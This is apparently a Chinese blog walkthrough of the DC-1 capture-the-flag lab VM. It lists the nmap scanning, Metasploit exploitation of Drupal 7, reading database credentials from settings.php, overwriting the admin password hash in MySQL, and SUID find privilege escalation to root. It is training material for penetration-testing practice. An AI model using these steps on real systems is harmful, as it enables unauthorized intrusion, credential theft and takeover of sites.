首页 > 其他分享 >DC-1超简便

DC-1超简便

时间:2024-09-24 18:52:27浏览次数:9  
标签:www set 查看 DC 192.168 ls 简便 输入

先查看IP  ifconfig

寻找靶机的真实

ip    nmap -sP 192.168.96.128/24

namp-A -p- -v 192.168.96.129(刚才查到的靶机的真实IP)

他是一个电信drupal 服务

Searchsploit drupal 7

MSF渗透

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

输入msfdb run后在输入search Drupal

测试2018

use 1

让靶机运行msf

set rhosts 192.168.96.129

再run运作

执行whoami

输入shell

在输入whoami

发现是www-data权限

进入home

cd /home后ls 后cd flag4后ls发现flag4.txt 需要提升权限(python -c "import pty;pty.spawn('/bin/bash')"

)然后就cat flag4.txt

输入cd /var/www后输入ls查看www目录下文件,发现flag1.txt文件,打开发现提示信息,寻找站点的配置文件

cat flag1.txt

Drupal的默认配置文件为

查看cat /var/www/sites/default/settings.php发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看

输入mysql -u dbuser -p后输入 'R0ck3t',

进入数据库show databases;在切换到数据库use drupaldb进入表show tables;

 查看查找默认的Drupal user 表select * from users;;

置换drupal密码

输入quit;

设置新密码php scripts/password-hash.sh 123

进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将pass字段进行替换

update users set 

pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

登录站点,打开浏览器输入靶机网址

192.168.96.129

账号admin

密码123

使用命令查看 suid 权限的可执行二进制程序

先quit

find / -perm -4000 2>/dev/null

发现find命令

使用命令测试,发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

发现最后的flag文件

标签:www,set,查看,DC,192.168,ls,简便,输入
From: https://blog.csdn.net/2401_85243367/article/details/142484398

相关文章

  • Flink CDC介绍:基于流的数据集成工具
    FlinkCDC是一个基于流的数据集成工具,旨在为用户提供一套功能更加全面的编程接口(API)。该工具使得用户能够以YAML配置文件的形式,优雅地定义其ETL(Extract,Transform,Load)流程,并协助用户自动化生成定制化的Flink算子并且提交Flink作业。FlinkCDC在任务提交过程中......
  • UnoCSS 给了我一个不用 tailwindcss 的理由
    如果你没有听说过 tailwindcss或者 unocss,请先 return 先去了解一下。开发上:可能为你甚至你们的前端团队节省很多写样式的时间,也能让你或者你们的项目开发体验有很大提升生产上:你们的项目打出来的包体积中的样式代码占比将突然骤降然后趋于不变。为什么我换到了UnoCSSt......
  • FMC子卡设计原理图:FMC-706 4通道250M/16bit ADC+4通道2800M/16bit DAC
    FMC子卡设计原理框图FMC-706模块可用于多通道的采集回放。ADC支持国产CL3669或进口ADS42LB69采集芯片,DAC支持国产GM9154或进口AD9144、AD9154芯片,输入和输出均为交流耦合方式。FMC子卡还支持外参考/外时钟、外触发接口,具有板载温度监控等功能主要技术参数:1)ADC:具有优异的性能......
  • 论文速递!时序预测!DCSDNet:双卷积季节性分解网络,应用于天然气消费预测过程
    本期推文将介绍一种新的时序预测方法:双卷积季节性分解网络(DualConvolutionwithSeasonalDecompositionNetwork,DCSDNet)在天然气消费预测的应用,这项研究发表于《AppliedEnergy》期刊。针对天然气消费的多重季节性和非规律性,推荐的文献提出了一种新的预测方法:双卷积季节性分解......
  • ridcp_pytorch基于codebook先验知识的图像去雾模型
    RIDCP论文RIDCP:RevitalizingRealImageDehazingviaHigh-QualityCodebookPriorshttps://arxiv.org/pdf/2304.03994.pdf模型结构ridcp先使用Encoder对输入进行特征提取得到Z,特征Z流向Gvq以及G,流向Gvq的Z被替换(CHM方法)为码本中的特征Zvq,然后Zvq通过Gvq获取各个层的......
  • DC00013基于jsp servlet javabeen鲜花销售管理系统网上花店含配套报告
    1、项目功能演示DC00013基于jsp+servlet+javabeen鲜花销售管理系统网上花店网站鲜花销售网上花店管理系统2、项目功能描述 基于jsp+servlet+javabeen鲜花销售管理系统分为用户和系统管理员两个角色。2.1用户功能1、系统登录、系统注册2、主页、产品信息、联系我们3......
  • DCDC 150V耐压 LED恒流IC-H6912 2.6v3.7v5v9v升压12V24V36V48V60V72V 补光灯芯片方案
    H6912:高性能DCDC升压恒流芯片,LED照明方案在LED照明领域,一款驱动器是光源稳定性。今天,我们要为大家分享惠海推出的H6912-DCDC升压恒流芯片——一款LED照明设计的高性能驱动器。H6912以其高精度恒流效果著称,输出电流恒流精度≤±3%,有效LED光源的稳定性和一致性,避免了因电流波动导致......
  • paimon flink cdc 整库同步
    --单表同步bin/flinkrun/opt/module/flink/opt/paimon-flink-action-0.9.0.jarmysql-sync-table--warehousehdfs://xx:8020/paimon/hive--databasedefault--tableuser1_sink--primary-keysid--mysql-confhostname=xx--mysql-confusername=xx--mysql-conf......
  • 关于bldc的学习笔记(三)无刷测速原理
    第一步:可以看出当只有一对级时,旋转一圈霍尔输出一个完整脉冲(一N一S)第二步:计算其中高电平的持续时间,即:t=C/Ft (其中Ft是计数频率,C为计数次数第三步:所以旋转一圈,需要的总时间为T=2*C/Ft所得出的结果就为:s/圈,倒数就为:圈/s,转化为RPM即:Ft/(2*C)*60即可值得注意的是,......
  • Podcast Subtitles AI Generator All In One
    PodcastSubtitlesAIGeneratorAllInOne播客字幕AI生成器???TranscribePodcasttoTexthttps://www.youtube.com/watch?v=WVhcmJl4ZFwhttps://video.adorilabs.com/https://www.youtube.com/watch?v=h5AEXBS5lf0https://www.media.io/transcribe-podcast-to-texts......